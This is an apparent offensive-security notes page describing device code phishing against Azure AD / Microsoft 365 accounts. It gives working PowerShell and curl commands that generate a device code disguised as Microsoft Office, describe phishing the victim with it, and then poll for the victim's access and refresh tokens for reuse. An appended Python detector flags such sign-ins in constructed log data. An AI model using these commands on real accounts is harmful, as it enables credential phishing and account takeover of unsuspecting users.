Otter's Notes

Abusing Device Code Authentication

Last updated 1 year ago

Device Code Authentication makes it possible to compromise an AAD / M365 account much like OAuth Abuse, but it is generally harder to detect and set up, and it doesn't require any input from the victim. The downside of this technique is that the device codes are only valid for a brief period (around 15 - 20 minutes), but since the attack yields a full PRT (access token + refresh token), the tokens can be refreshed for prolonged access.

To perform this attack we need to generate a URL to phish the user with, using the endpoint https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0.

For example, if we wanted to generate a link to phish for MS Graph access, the setup would look something like this:

PS /home/otter> $body=@{
>> "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
>> "resource" = "https://graph.microsoft.com"
>> }
PS /home/otter> $authResponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" -Body $body
PS /home/otter> $authResponse

user_code        : DQ3XNJXQS
device_code      : DAQABIQEAAADnfolhJpSnRYB1SVj-Hgd8UGlgrzcx_dLPNZrsSg2n7s2cJ7NUwT6Or8qUm8WorQnuVlGKVyavcbWqb1WG6kXei2J6-bmJt1OcBJslnUrIt5yhyb_bGqaaMpb2CdLPNSsqU-vJcnwyHqJrw40FWX_q46ydAuxVU8i4Qbnj6Ruo9qYKd7GWdaG1a4FDLI4Cc3UgAA
verification_url : https://microsoft.com/devicelogin
expires_in       : 900
interval         : 5
message          : To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code DQ3XNJXQS to authenticate.

In this case we used the client_id corresponding to Microsoft Office (as listed in the linked reference), but we can pick a different application to "disguise" our request as.

Now the attacker can send a phishing email using a template like the linked gist to try and get the victim's access token. Mind that you have to replace the code shown in the email (USER_CODE on line 223 of the gist) with the user_code you got during the setup process.

This technique can prove to be extremely effective as the user only visits legitimate Microsoft endpoints.

Once the victim follows the instructions in the email, we'll be able to send a POST request to the https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0 endpoint with the following data:

  • client_id
  • resource
  • grant_type
  • code

~ ∮ curl \
> --data client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c \
> --data resource=https://graph.microsoft.com \
> --data grant_type=ietf:params:oauth:grant_type:device_code \
> --data code=DAQABIQEAAADnfolhJpSnRYB1SVj-Hgd8UGlgrzcx_dLPNZrsSg2n7s2cJ7NUwT6Or8qUm8WorQnuVlGKVyavcbWqb1WG6kXei2J6-bmJt1OcBJslnUrIt5yhyb_bGqaaMpb2CdLPNSsqU-vJcnwyHqJrw40FWX_q46ydAuxVU8i4Qbnj6Ruo9qYKd7GWdaG1a4FDLI4Cc3UgAA \
> 'https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0'

If the user has successfully authenticated to this endpoint with our user code, we'll get a full PRT (both access and refresh tokens) in the response.

The PRT can then be used in requests, within the scope of the token itself, just by adding an Authorization header:

...
Authorization: Bearer <PRT>
...
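From the defender's side, the flow above leaves a trace: the token issued to the polling client is recorded as a device code sign-in for the victim. The following is an added example, not code from the original notes, that walks an exported set of Entra ID sign-in records and flags successful device code sign-ins, rating those issued to an IP outside the user's known set as high. It assumes the Microsoft Graph signIn field names (authenticationProtocol, appId, ipAddress, status.errorCode); the sample records and the per-user IP baseline are constructed.

```python
"""Flag device code sign-ins in an Entra ID sign-in export (added example;
Graph signIn field names assumed, records and IP baseline constructed)."""
import json

OFFICE_CLIENT_ID = "d3590ed6-52b3-4102-aeff-aad2292ab01c"  # client_id used above

# Constructed sample in the shape of a /auditLogs/signIns export.
SAMPLE_SIGNINS = json.dumps([
    {"userPrincipalName": "alice@contoso.example", "appId": OFFICE_CLIENT_ID,
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.7", "status": {"errorCode": 0}},
    {"userPrincipalName": "alice@contoso.example", "appId": OFFICE_CLIENT_ID,
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "none",
     "ipAddress": "198.51.100.10", "status": {"errorCode": 0}},
    {"userPrincipalName": "bob@contoso.example", "appId": OFFICE_CLIENT_ID,
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "ipAddress": "198.51.100.22", "status": {"errorCode": 0}},
    {"userPrincipalName": "bob@contoso.example", "appId": OFFICE_CLIENT_ID,
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.9", "status": {"errorCode": 70016}},  # constructed failure
])

# Hypothetical baseline of IPs each user normally signs in from.
KNOWN_IPS = {"alice@contoso.example": {"198.51.100.10"},
             "bob@contoso.example": {"198.51.100.22"}}


def find_device_code_signins(records, known_ips):
    """Return (upn, app, ip, severity) for each successful deviceCode sign-in.

    'high' when the token went to an IP outside the user's baseline (it is the
    phisher's polling host, not the victim's browser, that receives the token),
    otherwise 'review' since the flow is rarely needed on ordinary workstations.
    """
    findings = []
    for r in records:
        if r.get("authenticationProtocol") != "deviceCode":
            continue
        if r.get("status", {}).get("errorCode", 0) != 0:
            continue  # failed poll or expired code: no token was issued
        upn = r.get("userPrincipalName", "")
        ip = r.get("ipAddress")
        severity = "review" if ip in known_ips.get(upn, set()) else "high"
        findings.append((upn, r.get("appDisplayName"), ip, severity))
    return findings


def scan_export(raw_json, known_ips=KNOWN_IPS):
    """Parse a JSON sign-in export and return the findings list."""
    return find_device_code_signins(json.loads(raw_json), known_ips)
```

Run `scan_export(SAMPLE_SIGNINS)` to see the two successful device code sign-ins, with alice's (from an unknown IP) rated high.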